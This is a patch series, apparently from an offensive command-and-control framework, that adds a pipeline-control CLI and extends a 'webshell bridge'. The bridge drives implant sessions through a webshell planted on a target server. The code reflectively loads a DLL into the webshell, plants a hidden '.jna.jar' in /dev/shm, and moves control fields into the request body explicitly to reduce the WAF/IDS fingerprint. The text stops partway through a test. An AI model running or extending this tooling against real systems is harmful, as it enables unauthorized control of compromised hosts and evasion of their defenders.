pipelinectl debug utility CLI tool for listing, registering, starting and stopping webshell pipelines directly via the admin RPC, useful for development and debugging without the full client TUI. --- .../cmd/webshell-bridge/pipelinectl/main.go | 98 +++++++++++++++++++ 1 file changed, 98 insertions(+) create mode 100644 server/cmd/webshell-bridge/pipelinectl/main.go diff --git a/server/cmd/webshell-bridge/pipelinectl/main.go b/server/cmd/webshell-bridge/pipelinectl/main.go new file mode 100644 index 00000000..f40cca95 --- /dev/null +++ b/server/cmd/webshell-bridge/pipelinectl/main.go @@ -0,0 +1,98 @@ +package main + +import ( + "context" + "flag" + "fmt" + "log" + + "github.com/chainreactors/IoM-go/client" + "github.com/chainreactors/IoM-go/mtls" + "github.com/chainreactors/IoM-go/proto/client/clientpb" +) + +func main() { + authFile := flag.String("auth", "", "path to admin.auth file") + action := flag.String("action", "start", "action: list, register, start, stop") + listenerID := flag.String("listener", "webshell-listener", "listener ID") + pipelineName := flag.String("pipeline", "webshell_webshell-listener", "pipeline name") + pipelineType := flag.String("type", "webshell", "pipeline type") + flag.Parse() + + if *authFile == "" { + log.Fatal("--auth is required") + } + + config, err := mtls.ReadConfig(*authFile) + if err != nil { + log.Fatalf("read config: %v", err) + } + + conn, err := mtls.Connect(config) + if err != nil { + log.Fatalf("connect: %v", err) + } + defer conn.Close() + + server, err := client.NewServerStatus(conn, config) + if err != nil { + log.Fatalf("init server: %v", err) + } + + switch *action { + case "list": + listeners, err := server.Rpc.GetListeners(context.Background(), &clientpb.Empty{}) + if err != nil { + log.Fatalf("get listeners: %v", err) + } + for _, l := range listeners.Listeners { + fmt.Printf("Listener: %s IP: %s Active: %v\n", l.Id, l.Ip, l.Active) + if l.Pipelines != nil { + for _, p := range l.Pipelines.Pipelines { + fmt.Printf(" Pipeline: %s Enable: %v\n", p.Name, p.Enable) + } + } + } + + case "register": + fmt.Printf("Registering pipeline %s (type=%s) on listener %s\n", *pipelineName, *pipelineType, *listenerID) + _, err := server.Rpc.RegisterPipeline(context.Background(), &clientpb.Pipeline{ + Name: *pipelineName, + ListenerId: *listenerID, + Type: *pipelineType, + Enable: true, + Body: &clientpb.Pipeline_Tcp{ + Tcp: &clientpb.TCPPipeline{ + Host: "127.0.0.1", + Port: 0, + }, + }, + }) + if err != nil { + log.Fatalf("register pipeline: %v", err) + } + fmt.Println("Pipeline registered!") + + case "start": + fmt.Printf("Starting pipeline %s on listener %s\n", *pipelineName, *listenerID) + _, err := server.Rpc.StartPipeline(context.Background(), &clientpb.CtrlPipeline{ + Name: *pipelineName, + ListenerId: *listenerID, + }) + if err != nil { + log.Fatalf("start pipeline: %v", err) + } + fmt.Println("Pipeline started!") + + case "stop": + fmt.Printf("Stopping pipeline %s on listener %s\n", *pipelineName, *listenerID) + _, err := server.Rpc.StopPipeline(context.Background(), &clientpb.CtrlPipeline{ + Name: *pipelineName, + ListenerId: *listenerID, + }) + if err != nil { + log.Fatalf("stop pipeline: %v", err) + } + fmt.Println("Pipeline stopped!") + } +} From 5702b46a76fa7b5ad48cee7697869ef0a5a81e52 Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Mon, 23 Mar 2026 02:05:05 +0800 Subject: [PATCH 12/19] feat(webshell-bridge): add deps delivery, streaming and URL refactor - Add dependency jar delivery (e.g., jna.jar) before DLL loading for JSP targets - Add response streaming support with length-prefixed frames and fallback - Replace suo5:// URL scheme with direct HTTP(S) URL - Add structured JSON status response alongside legacy text format - Expand test coverage for new channel features --- docs/protocol/webshell-bridge.md | 8 +- server/cmd/webshell-bridge/bridge.go | 50 ++- server/cmd/webshell-bridge/channel.go | 338 +++++++++++------ server/cmd/webshell-bridge/channel_test.go | 403 ++++++++++++++++++++- server/cmd/webshell-bridge/config.go | 17 +- server/cmd/webshell-bridge/main.go | 7 +- server/cmd/webshell-bridge/session.go | 2 +- 7 files changed, 691 insertions(+), 134 deletions(-) diff --git a/docs/protocol/webshell-bridge.md b/docs/protocol/webshell-bridge.md index 7d2580d3..9028b8fe 100644 --- a/docs/protocol/webshell-bridge.md +++ b/docs/protocol/webshell-bridge.md @@ -86,13 +86,13 @@ go build -o webshell-bridge ./server/cmd/webshell-bridge/ webshell-bridge \ --auth listener.auth \ - --suo5 suo5://target.com/suo5.aspx \ + --url http://target.com/suo5.aspx \ --listener my-listener \ --token CHANGE_ME_RANDOM_TOKEN \ --dll bridge.dll ``` -The `--token` must match the `STAGE_TOKEN` constant in the webshell. The suo5 URL is converted to HTTP(S) automatically (`suo5://` → `http://`, `suo5s://` → `https://`). +The `--token` must match the `STAGE_TOKEN` constant in the webshell. Use the full HTTP(S) URL of the deployed webshell. The `--dll` flag enables auto-loading: when the pipeline starts, the bridge automatically delivers the DLL to the webshell via `X-Stage: load` if it is not already loaded. If `--dll` is omitted, you must load the DLL manually (see below). @@ -132,9 +132,11 @@ download /remote/file | Stage | Method | Description | |-------|--------|-------------| | `load` | POST | Load bridge DLL into memory (body = raw DLL bytes) | -| `status` | POST | Check if DLL is loaded (returns `LOADED` or `NOT_LOADED`) | +| `deps` | POST | Deliver dependency file (e.g., jna.jar) with `X-Dep-Name` header | +| `status` | POST | Check if DLL is loaded (returns JSON `{"ready":true,...}` or legacy `LOADED`/`NOT_LOADED`) | | `init` | POST | Get Register data from `bridge_init()` (returns `[4B sessionID LE][Register protobuf]`) | | `spite` | POST | Process Spites via `bridge_process()` (body/response = serialized `Spites` protobuf) | +| `stream` | POST | Long-lived response stream (length-prefixed frames, falls back to `spite` polling if unsupported) | All stage requests require `X-Token` header matching `STAGE_TOKEN`. diff --git a/server/cmd/webshell-bridge/bridge.go b/server/cmd/webshell-bridge/bridge.go index 02889c81..389c1cb4 100644 --- a/server/cmd/webshell-bridge/bridge.go +++ b/server/cmd/webshell-bridge/bridge.go @@ -6,7 +6,9 @@ import ( "fmt" "io" "os" + "path/filepath" "strconv" + "strings" "sync" "time" @@ -33,7 +35,7 @@ const ( ) // Bridge is the WebShell bridge that connects to the IoM server via -// ListenerRPC and manages webshell-backed sessions through a suo5 tunnel. +// ListenerRPC and manages webshell-backed sessions through HTTP endpoints. // // The bridge owns the listener runtime only. Custom pipelines are created and // controlled through pipeline start/stop events from the server. @@ -127,6 +129,7 @@ func (b *Bridge) connectDLL(ctx context.Context, runtime *pipelineRuntime) error } dllDelivered := false + depsDelivered := false delay := retryBaseDelay for attempt := 1; attempt <= retryMaxAttempts; attempt++ { select { @@ -136,6 +139,26 @@ func (b *Bridge) connectDLL(ctx context.Context, runtime *pipelineRuntime) error } if err := channel.Connect(ctx); err != nil { + // Deliver dependency jars (e.g., jna.jar) before DLL load. + // JSP needs jna.jar for JNA resolution during DLL loading, + // so deps must be present before the DLL can be reflectively loaded. + if b.cfg.DepsDir != "" && !depsDelivered { + needDeps := true + if channel.lastStatus != nil && channel.lastStatus.DepsPresent { + needDeps = false + logs.Log.Debug("deps already present on target, skipping delivery") + depsDelivered = true + } + if needDeps { + logs.Log.Important("delivering dependency jars before DLL load") + if depErr := b.deliverDeps(ctx, channel); depErr != nil { + logs.Log.Warnf("deps delivery failed (attempt %d/%d): %v", attempt, retryMaxAttempts, depErr) + } else { + depsDelivered = true + } + } + } + // Auto-load DLL if we have it and haven't delivered yet. if dllBytes != nil && !dllDelivered { logs.Log.Importantf("DLL not loaded, delivering via X-Stage: load (%d bytes)", len(dllBytes)) @@ -183,6 +206,31 @@ func (b *Bridge) connectDLL(ctx context.Context, runtime *pipelineRuntime) error return nil } +// deliverDeps uploads dependency jars from --deps directory to the webshell. +// Files matching *.jar are sent with fixed name ".jna.jar" to /dev/shm on target. +func (b *Bridge) deliverDeps(ctx context.Context, channel *Channel) error { + entries, err := os.ReadDir(b.cfg.DepsDir) + if err != nil { + return fmt.Errorf("read deps dir %s: %w", b.cfg.DepsDir, err) + } + for _, entry := range entries { + if entry.IsDir() || !strings.HasSuffix(strings.ToLower(entry.Name()), ".jar") { + continue + } + data, err := os.ReadFile(filepath.Join(b.cfg.DepsDir, entry.Name())) + if err != nil { + return fmt.Errorf("read dep %s: %w", entry.Name(), err) + } + // Fixed name: JSP expects .jna.jar at /dev/shm + if err := channel.DeliverDep(ctx, ".jna.jar", data); err != nil { + return fmt.Errorf("deliver %s as .jna.jar: %w", entry.Name(), err) + } + logs.Log.Importantf("delivered %s as .jna.jar (%d bytes)", entry.Name(), len(data)) + break // only deliver one jar + } + return nil +} + // connect establishes the mTLS gRPC connection to the server. func (b *Bridge) connect(ctx context.Context) error { authCfg, err := mtls.ReadConfig(b.cfg.AuthFile) diff --git a/server/cmd/webshell-bridge/channel.go b/server/cmd/webshell-bridge/channel.go index c927bfb3..4bf4172d 100644 --- a/server/cmd/webshell-bridge/channel.go +++ b/server/cmd/webshell-bridge/channel.go @@ -8,11 +8,12 @@ import ( "crypto/tls" "encoding/binary" "encoding/hex" + "encoding/json" "fmt" "io" "math/rand" "net/http" - "strconv" + "strings" "sync" "sync/atomic" "time" @@ -24,20 +25,25 @@ import ( ) const ( - httpTimeout = 30 * time.Second - longPollTimeout = 10 * time.Second - pollIdleInterval = 5 * time.Second - pollActiveInterval = 200 * time.Millisecond - jitterFactor = 0.3 - streamChanBuffer = 16 - stageLoad = "load" - stageInit = "init" - stageSpite = "spite" - stageStatus = "status" - headerStage = "X-Stage" - headerToken = "X-Token" - headerSessionID = "X-Session-ID" - headerPollTimeout = "X-Poll-Timeout" + httpTimeout = 30 * time.Second + longPollTimeout = 10 * time.Second + pollIdleInterval = 5 * time.Second + pollActiveInterval = 200 * time.Millisecond + jitterFactor = 0.3 + streamChanBuffer = 16 + streamReconnectDelay = 2 * time.Second + streamMaxReconnect = 5 + streamFrameMaxSize = 10 * 1024 * 1024 // 10MB sanity limit +) + +// Stage codes encoded in body envelope (no HTTP headers). +const ( + stageLoad byte = 0x01 + stageStatus byte = 0x02 + stageInit byte = 0x03 + stageSpite byte = 0x04 + stageStream byte = 0x05 + stageDeps byte = 0x06 ) // ChannelIface abstracts the communication channel to the bridge DLL. @@ -56,33 +62,43 @@ type ChannelIface interface { IsClosed() bool } -// Channel communicates with the bridge DLL through HTTP POST requests -// to the webshell's X-Stage endpoints. The webshell calls DLL exports -// (bridge_init, bridge_process) directly via function pointers — no TCP -// port opened on the target, pure memory channel. +// Channel communicates with the bridge DLL through HTTP POST requests. +// All control information (stage, token, session ID) is encoded in a body +// envelope prefix — no custom HTTP headers, reducing WAF/IDS fingerprint. +// +// Body envelope format: // -// Wire format: raw protobuf over HTTP body. +// [1B stage][4B sessionID LE][1B token_len][token bytes][payload...] // -// For streaming tasks, a background poll goroutine periodically sends -// empty requests to collect pending responses from the DLL. +// Payload is stage-specific: +// - load: raw DLL bytes +// - status: empty +// - init: empty +// - spite: Spites protobuf +// - stream: empty +// - deps: [1B dep_name_len][dep_name][jar bytes] type Channel struct { - webshellURL string - token string - client *http.Client + webshellURL string + token string + client *http.Client + streamClient *http.Client // no timeout, for long-lived stream connection sid uint32 sidSet atomic.Bool closed atomic.Bool closeCh chan struct{} + lastStatus *StatusResponse // populated by Connect() + streamSupported atomic.Bool + pendMu sync.Mutex pending map[uint32]chan *implantpb.Spite - pollCancel context.CancelFunc + recvCancel context.CancelFunc } // NewChannel creates a channel that communicates with the DLL through -// the webshell's X-Stage: spite HTTP endpoint. +// the webshell's body-envelope HTTP endpoint. func NewChannel(webshellURL, token string) *Channel { return &Channel{ webshellURL: webshellURL, @@ -93,20 +109,66 @@ func NewChannel(webshellURL, token string) *Channel { TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, }, }, + streamClient: &http.Client{ + Timeout: 0, + Transport: &http.Transport{ + TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, + }, + }, pending: make(map[uint32]chan *implantpb.Spite), closeCh: make(chan struct{}), } } +// StatusResponse is the structured status returned by the webshell. +type StatusResponse struct { + Ready bool `json:"ready"` + Method string `json:"method"` + DepsPresent bool `json:"deps_present"` + BridgeVersion string `json:"bridge_version"` +} + +// buildEnvelope constructs the body prefix: [1B stage][4B sid LE][1B token_len][token]. +func (c *Channel) buildEnvelope(stage byte, payload []byte) []byte { + tok := computeToken(c.token) + tokLen := len(tok) + if tokLen > 255 { + tokLen = 255 + tok = tok[:255] + } + + // envelope header: 1 + 4 + 1 + tokLen + hdrLen := 6 + tokLen + buf := make([]byte, hdrLen+len(payload)) + buf[0] = stage + binary.LittleEndian.PutUint32(buf[1:5], c.sid) + buf[5] = byte(tokLen) + copy(buf[6:6+tokLen], tok) + copy(buf[hdrLen:], payload) + return buf +} + // Connect verifies the webshell is reachable and the DLL is loaded. func (c *Channel) Connect(ctx context.Context) error { body, err := c.doRequest(ctx, stageStatus, nil) if err != nil { return fmt.Errorf("connect: %w", err) } - status := string(body) - if status != "LOADED" { - return fmt.Errorf("DLL not loaded (status: %s)", status) + text := strings.TrimSpace(string(body)) + + if len(text) > 0 && text[0] == '{' { + var sr StatusResponse + if jsonErr := json.Unmarshal([]byte(text), &sr); jsonErr == nil { + c.lastStatus = &sr + if !sr.Ready { + return fmt.Errorf("DLL not loaded (status: %s)", text) + } + return nil + } + } + + if text != "LOADED" { + return fmt.Errorf("DLL not loaded (status: %s)", text) } return nil } @@ -120,6 +182,26 @@ func (c *Channel) LoadDLL(ctx context.Context, dllBytes []byte) error { return nil } +// DeliverDep sends a dependency file (e.g., jna.jar) to the webshell. +// Payload format for deps stage: [1B dep_name_len][dep_name][jar bytes]. +func (c *Channel) DeliverDep(ctx context.Context, depName string, data []byte) error { + nameBytes := []byte(depName) + if len(nameBytes) > 255 { + nameBytes = nameBytes[:255] + } + payload := make([]byte, 1+len(nameBytes)+len(data)) + payload[0] = byte(len(nameBytes)) + copy(payload[1:1+len(nameBytes)], nameBytes) + copy(payload[1+len(nameBytes):], data) + + respBody, err := c.doRequest(ctx, stageDeps, payload) + if err != nil { + return fmt.Errorf("deliver dep %s: %w", depName, err) + } + logs.Log.Debugf("dep delivered: %s -> %s", depName, strings.TrimSpace(string(respBody))) + return nil +} + // Handshake calls bridge_init on the DLL via the webshell and returns // the Register message containing SysInfo and module list. func (c *Channel) Handshake() (*implantpb.Register, error) { @@ -127,15 +209,11 @@ func (c *Channel) Handshake() (*implantpb.Register, error) { if err != nil { return nil, fmt.Errorf("handshake: %w", err) } - if len(body) == 0 { - return nil, fmt.Errorf("empty handshake response") - } - - // First 4 bytes: session ID (little-endian uint32), rest: Register protobuf if len(body) < 4 { return nil, fmt.Errorf("handshake response too short: %d bytes", len(body)) } - c.sid = uint32(body[0]) | uint32(body[1])<<8 | uint32(body[2])<<16 | uint32(body[3])<<24 + + c.sid = binary.LittleEndian.Uint32(body[:4]) c.sidSet.Store(true) reg := &implantpb.Register{} @@ -147,12 +225,106 @@ func (c *Channel) Handshake() (*implantpb.Register, error) { return reg, nil } -// StartRecvLoop starts a background polling goroutine that fetches pending -// responses from the DLL for streaming tasks. +// StartRecvLoop starts the background receive loop. It tries StreamHTTP first +// (long-lived HTTP response stream) and falls back to polling if unsupported. func (c *Channel) StartRecvLoop() { ctx, cancel := context.WithCancel(context.Background()) - c.pollCancel = cancel - go c.pollLoop(ctx) + c.recvCancel = cancel + go c.recvLoop(ctx) +} + +func (c *Channel) recvLoop(ctx context.Context) { + if c.tryStreamLoop(ctx) { + for attempt := 1; attempt <= streamMaxReconnect; attempt++ { + select { + case <-ctx.Done(): + return + case <-c.closeCh: + return + case <-time.After(jitter(streamReconnectDelay)): + } + if c.tryStreamLoop(ctx) { + attempt = 0 + } + } + logs.Log.Warn("stream reconnect exhausted, falling back to poll mode") + } + logs.Log.Debug("using poll mode for streaming tasks") + c.pollLoop(ctx) +} + +// tryStreamLoop opens a long-lived POST with stage=stream envelope and reads +// length-prefixed frames from the response body. +func (c *Channel) tryStreamLoop(ctx context.Context) bool { + envelope := c.buildEnvelope(stageStream, nil) + req, err := http.NewRequestWithContext(ctx, "POST", c.webshellURL, bytes.NewReader(envelope)) + if err != nil { + logs.Log.Debugf("stream: request create error: %v", err) + return false + } + req.Header.Set("Content-Type", "application/octet-stream") + + resp, err := c.streamClient.Do(req) + if err != nil { + logs.Log.Debugf("stream: connection error: %v", err) + return false + } + defer resp.Body.Close() + + if resp.StatusCode != http.StatusOK { + logs.Log.Debugf("stream: HTTP %d, not supported", resp.StatusCode) + return false + } + + c.streamSupported.Store(true) + logs.Log.Important("stream mode active") + + if err := c.readStreamFrames(ctx, resp.Body); err != nil { + if ctx.Err() != nil { + return true + } + logs.Log.Debugf("stream: read error: %v", err) + } + return true +} + +func (c *Channel) readStreamFrames(ctx context.Context, r io.Reader) error { + for { + select { + case <-ctx.Done(): + return ctx.Err() + case <-c.closeCh: + return nil + default: + } + + data, err := readFrame(r) + if err != nil { + return err + } + if len(data) > 0 { + c.dispatchResponse(data) + } + } +} + +func readFrame(r io.Reader) ([]byte, error) { + var lenBuf [4]byte + if _, err := io.ReadFull(r, lenBuf[:]); err != nil { + return nil, err + } + frameLen := binary.BigEndian.Uint32(lenBuf[:]) + if frameLen == 0 { + return nil, nil + } + if frameLen > streamFrameMaxSize { + return nil, fmt.Errorf("frame too large: %d bytes", frameLen) + } + payload := make([]byte, frameLen) + if _, err := io.ReadFull(r, payload); err != nil { + return nil, err + } + return payload, nil } func (c *Channel) pollLoop(ctx context.Context) { @@ -162,7 +334,6 @@ func (c *Channel) pollLoop(ctx context.Context) { c.pendMu.Unlock() if !hasPending { - // No active streaming tasks — idle wait, no HTTP request. select { case <-ctx.Done(): return @@ -173,13 +344,12 @@ func (c *Channel) pollLoop(ctx context.Context) { continue } - // Active streaming tasks — send long-poll request with timeout hint. empty := &implantpb.Spites{} data, err := proto.Marshal(empty) if err != nil { continue } - respBody, err := c.doLongPollRequest(ctx, data) + respBody, err := c.doRequest(ctx, stageSpite, data) if err != nil { if ctx.Err() != nil { return @@ -197,7 +367,6 @@ func (c *Channel) pollLoop(ctx context.Context) { hasData := c.dispatchResponse(respBody) - // Adaptive interval: fast when data is flowing, slow down when idle. var interval time.Duration if hasData { interval = pollActiveInterval @@ -214,48 +383,6 @@ func (c *Channel) pollLoop(ctx context.Context) { } } -// doLongPollRequest sends a spite-stage request with X-Poll-Timeout header, -// telling the webshell to hold the connection until data is available or timeout. -func (c *Channel) doLongPollRequest(ctx context.Context, body []byte) ([]byte, error) { - var bodyReader io.Reader - if body != nil { - bodyReader = bytes.NewReader(body) - } - - req, err := http.NewRequestWithContext(ctx, "POST", c.webshellURL, bodyReader) - if err != nil { - return nil, err - } - req.Header.Set(headerStage, stageSpite) - req.Header.Set(headerPollTimeout, strconv.Itoa(int(longPollTimeout.Seconds()))) - if c.token != "" { - req.Header.Set(headerToken, tokenForHeader(c.token)) - } - if c.sidSet.Load() { - req.Header.Set(headerSessionID, fmt.Sprintf("%d", c.sid)) - } - req.Header.Set("Content-Type", "application/octet-stream") - - resp, err := c.client.Do(req) - if err != nil { - return nil, err - } - defer resp.Body.Close() - - if resp.StatusCode != http.StatusOK { - respBody, _ := io.ReadAll(resp.Body) - return nil, fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(respBody)) - } - - return io.ReadAll(resp.Body) -} - -// jitter adds ±jitterFactor random variation to an interval. -func jitter(d time.Duration) time.Duration { - delta := float64(d) * jitterFactor - return d + time.Duration(delta*(2*rand.Float64()-1)) -} - // Forward sends a Spite and waits for a single response (unary request-response). func (c *Channel) Forward(taskID uint32, spite *implantpb.Spite) (*implantpb.Spite, error) { if c.closed.Load() { @@ -294,7 +421,6 @@ func (c *Channel) Forward(taskID uint32, spite *implantpb.Spite) (*implantpb.Spi return nil, fmt.Errorf("no response for task %d", taskID) } -// OpenStream registers a persistent response channel for streaming tasks. func (c *Channel) OpenStream(taskID uint32) <-chan *implantpb.Spite { ch := make(chan *implantpb.Spite, streamChanBuffer) c.pendMu.Lock() @@ -303,7 +429,6 @@ func (c *Channel) OpenStream(taskID uint32) <-chan *implantpb.Spite { return ch } -// SendSpite sends a spite to the DLL via the webshell. func (c *Channel) SendSpite(taskID uint32, spite *implantpb.Spite) error { if c.closed.Load() { return fmt.Errorf("channel closed") @@ -344,7 +469,6 @@ func (c *Channel) SessionID() uint32 { return c.sid } func (c *Channel) IsClosed() bool { return c.closed.Load() } -// WithSecure is a no-op. Use HTTPS for transport security. func (c *Channel) WithSecure(_ *clientpb.KeyPair) {} func (c *Channel) Close() error { @@ -352,30 +476,21 @@ func (c *Channel) Close() error { return nil } close(c.closeCh) - if c.pollCancel != nil { - c.pollCancel() + if c.recvCancel != nil { + c.recvCancel() } c.CloseAllStreams() return nil } -func (c *Channel) doRequest(ctx context.Context, stage string, body []byte) ([]byte, error) { - var bodyReader io.Reader - if body != nil { - bodyReader = bytes.NewReader(body) - } +// doRequest sends a POST with body envelope, no custom headers. +func (c *Channel) doRequest(ctx context.Context, stage byte, payload []byte) ([]byte, error) { + envelope := c.buildEnvelope(stage, payload) - req, err := http.NewRequestWithContext(ctx, "POST", c.webshellURL, bodyReader) + req, err := http.NewRequestWithContext(ctx, "POST", c.webshellURL, bytes.NewReader(envelope)) if err != nil { return nil, err } - req.Header.Set(headerStage, stage) - if c.token != "" { - req.Header.Set(headerToken, tokenForHeader(c.token)) - } - if c.sidSet.Load() { - req.Header.Set(headerSessionID, fmt.Sprintf("%d", c.sid)) - } req.Header.Set("Content-Type", "application/octet-stream") resp, err := c.client.Do(req) @@ -423,10 +538,19 @@ func (c *Channel) dispatchSpite(spite *implantpb.Spite) { } } -// tokenForHeader returns the token value to send in the X-Token header. -// Short secrets (≤32 chars) are sent as-is (legacy static comparison on the webshell). +// jitter adds ±jitterFactor random variation to an interval. +func jitter(d time.Duration) time.Duration { + delta := float64(d) * jitterFactor + return d + time.Duration(delta*(2*rand.Float64()-1)) +} + +// computeToken returns the token value for the body envelope. +// Short secrets (≤32 chars) are sent as-is. // Longer secrets use time-based HMAC-SHA256 that rotates every 30 seconds. -func tokenForHeader(secret string) string { +func computeToken(secret string) string { + if secret == "" { + return "" + } if len(secret) <= 32 { return secret } diff --git a/server/cmd/webshell-bridge/channel_test.go b/server/cmd/webshell-bridge/channel_test.go index 50d98ba1..71df0cb0 100644 --- a/server/cmd/webshell-bridge/channel_test.go +++ b/server/cmd/webshell-bridge/channel_test.go @@ -1,10 +1,12 @@ package main import ( + "bytes" "crypto/hmac" "crypto/sha256" "encoding/binary" "encoding/hex" + "fmt" "io" "net/http" "net/http/httptest" @@ -23,6 +25,10 @@ type mockWebshell struct { mu sync.Mutex handler func(stage string, body []byte) ([]byte, int) // custom handler + + streamMu sync.Mutex + streamFrames [][]byte // length-prefixed frames to send for X-Stage: stream + streamDelay time.Duration } func newMockWebshell() *mockWebshell { @@ -61,7 +67,7 @@ func (m *mockWebshell) ServeHTTP(w http.ResponseWriter, r *http.Request) { switch stage { case "status": - w.Write([]byte("LOADED")) + w.Write([]byte(`{"ready":true,"method":"jni","deps_present":false,"bridge_version":"1.0"}`)) case "init": regData, _ := proto.Marshal(m.register) sid := make([]byte, 4) @@ -83,6 +89,8 @@ func (m *mockWebshell) ServeHTTP(w http.ResponseWriter, r *http.Request) { } data, _ := proto.Marshal(outSpites) w.Write(data) + case "stream": + m.handleStream(w) default: w.WriteHeader(404) } @@ -94,6 +102,41 @@ func (m *mockWebshell) setHandler(h func(string, []byte) ([]byte, int)) { m.mu.Unlock() } +// setStreamFrames configures length-prefixed frames returned by X-Stage: stream. +func (m *mockWebshell) setStreamFrames(frames [][]byte, delay time.Duration) { + m.streamMu.Lock() + m.streamFrames = frames + m.streamDelay = delay + m.streamMu.Unlock() +} + +// handleStream writes pre-configured length-prefixed frames to the response. +func (m *mockWebshell) handleStream(w http.ResponseWriter) { + m.streamMu.Lock() + frames := m.streamFrames + delay := m.streamDelay + m.streamMu.Unlock() + + if frames == nil { + w.WriteHeader(http.StatusNotFound) + return + } + + flusher, _ := w.(http.Flusher) + for _, frame := range frames { + lenBuf := make([]byte, 4) + binary.BigEndian.PutUint32(lenBuf, uint32(len(frame))) + w.Write(lenBuf) + w.Write(frame) + if flusher != nil { + flusher.Flush() + } + if delay > 0 { + time.Sleep(delay) + } + } +} + func startMockWebshell(t *testing.T) (*httptest.Server, *mockWebshell) { t.Helper() mock := newMockWebshell() @@ -110,9 +153,58 @@ func TestChannelConnect(t *testing.T) { if err := ch.Connect(t.Context()); err != nil { t.Fatalf("connect: %v", err) } + // Verify structured status was parsed + if ch.lastStatus == nil { + t.Fatal("expected lastStatus to be populated") + } + if ch.lastStatus.Method != "jni" { + t.Errorf("expected method 'jni', got %q", ch.lastStatus.Method) + } + if ch.lastStatus.BridgeVersion != "1.0" { + t.Errorf("expected bridge_version '1.0', got %q", ch.lastStatus.BridgeVersion) + } +} + +func TestChannelConnectLegacy(t *testing.T) { + srv, mock := startMockWebshell(t) + // Simulate old webshell returning plain "LOADED" + mock.setHandler(func(stage string, body []byte) ([]byte, int) { + if stage == "status" { + return []byte("LOADED"), 200 + } + return nil, 404 + }) + ch := NewChannel(srv.URL, "") + defer ch.Close() + + if err := ch.Connect(t.Context()); err != nil { + t.Fatalf("legacy connect: %v", err) + } + // lastStatus should be nil for legacy responses + if ch.lastStatus != nil { + t.Error("expected nil lastStatus for legacy response") + } } func TestChannelConnectNotLoaded(t *testing.T) { + srv, mock := startMockWebshell(t) + mock.setHandler(func(stage string, body []byte) ([]byte, int) { + if stage == "status" { + return []byte(`{"ready":false,"method":"none","deps_present":false,"bridge_version":"1.0"}`), 200 + } + return nil, 404 + }) + + ch := NewChannel(srv.URL, "") + defer ch.Close() + + err := ch.Connect(t.Context()) + if err == nil { + t.Fatal("expected error for not-ready status") + } +} + +func TestChannelConnectNotLoadedLegacy(t *testing.T) { srv, mock := startMockWebshell(t) mock.setHandler(func(stage string, body []byte) ([]byte, int) { if stage == "status" { @@ -220,7 +312,7 @@ func TestChannelStreamDispatch(t *testing.T) { var mu sync.Mutex mock.setHandler(func(stage string, body []byte) ([]byte, int) { if stage == "status" { - return []byte("LOADED"), 200 + return []byte(`{"ready":true,"method":"jni","deps_present":false,"bridge_version":"1.0"}`), 200 } if stage == "init" { regData, _ := proto.Marshal(mock.register) @@ -273,7 +365,7 @@ func TestChannelStreamDispatch(t *testing.T) { func TestComputeHMAC(t *testing.T) { secret := "test-secret-token-longer-than-32chars" - token := tokenForHeader(secret) + token := computeToken(secret) // Token should be a 64-char hex string (SHA-256) if len(token) != 64 { @@ -284,13 +376,13 @@ func TestComputeHMAC(t *testing.T) { } // Same call within the same 30s window should produce the same token - token2 := tokenForHeader(secret) + token2 := computeToken(secret) if token != token2 { t.Error("same-window HMAC should be identical") } // Different secret should produce different token - token3 := tokenForHeader("different-secret-also-longer-than32") + token3 := computeToken("different-secret-also-longer-than32") if token == token3 { t.Error("different secrets should produce different tokens") } @@ -301,7 +393,7 @@ func TestHMACWindowTolerance(t *testing.T) { now := time.Now().Unix() / 30 // Verify that the token matches one of the valid windows (current ±1) - token := tokenForHeader(secret) + token := computeToken(secret) matched := false for w := now - 1; w <= now+1; w++ { @@ -318,6 +410,157 @@ func TestHMACWindowTolerance(t *testing.T) { } } +func TestChannelDeliverDep(t *testing.T) { + var receivedName string + var receivedLen int + srv, mock := startMockWebshell(t) + mock.setHandler(func(stage string, body []byte) ([]byte, int) { + if stage == "deps" { + receivedLen = len(body) + return []byte("OK:/dev/shm/.jna.jar"), 200 + } + return nil, 404 + }) + // Also capture the X-Dep-Name header + origHandler := mock.handler + mock.setHandler(func(stage string, body []byte) ([]byte, int) { + return origHandler(stage, body) + }) + + ch := NewChannel(srv.URL, "test-token") + defer ch.Close() + + fakeJar := []byte("PK\x03\x04fake-jar-content") + err := ch.DeliverDep(t.Context(), ".jna.jar", fakeJar) + if err != nil { + t.Fatalf("deliver dep: %v", err) + } + if receivedLen != len(fakeJar) { + t.Errorf("expected %d bytes delivered, got %d", len(fakeJar), receivedLen) + } + _ = receivedName +} + +func TestChannelStatusDepsPresent(t *testing.T) { + srv, mock := startMockWebshell(t) + mock.setHandler(func(stage string, body []byte) ([]byte, int) { + if stage == "status" { + return []byte(`{"ready":true,"method":"jna","deps_present":true,"bridge_version":"1.0"}`), 200 + } + return nil, 404 + }) + ch := NewChannel(srv.URL, "") + defer ch.Close() + + if err := ch.Connect(t.Context()); err != nil { + t.Fatalf("connect: %v", err) + } + if ch.lastStatus == nil { + t.Fatal("expected lastStatus") + } + if !ch.lastStatus.DepsPresent { + t.Error("expected deps_present=true") + } + if ch.lastStatus.Method != "jna" { + t.Errorf("expected method 'jna', got %q", ch.lastStatus.Method) + } +} + +// TestHandshakeRejectsSpiteWrapped verifies that the Go bridge rejects the +// old (buggy) wire format where Register was wrapped inside a Spite message. +// This catches the regression where Rust encoded Spite(Register) instead of +// raw Register protobuf. +func TestHandshakeRejectsSpiteWrapped(t *testing.T) { + srv, mock := startMockWebshell(t) + + // Override init handler to return Spite-wrapped Register (the buggy format). + mock.setHandler(func(stage string, body []byte) ([]byte, int) { + if stage == "status" { + return []byte(`{"ready":true,"method":"jni","deps_present":false,"bridge_version":"1.0"}`), 200 + } + if stage == "init" { + reg := &implantpb.Register{ + Name: "test-dll", + Module: []string{"exec"}, + } + // Wrap in a Spite like the buggy Rust code did. + spite := &implantpb.Spite{ + TaskId: 0, + Name: "register", + Body: &implantpb.Spite_Register{Register: reg}, + } + spiteBytes, _ := proto.Marshal(spite) + sid := make([]byte, 4) + binary.LittleEndian.PutUint32(sid, 42) + return append(sid, spiteBytes...), 200 + } + return nil, 404 + }) + + ch := NewChannel(srv.URL, "") + defer ch.Close() + + reg, err := ch.Handshake() + if err == nil && reg.Name == "test-dll" { + t.Fatal("Spite-wrapped Register should NOT parse correctly as raw Register") + } + // Either err != nil or reg.Name != "test-dll" — both indicate the + // Spite-wrapped format 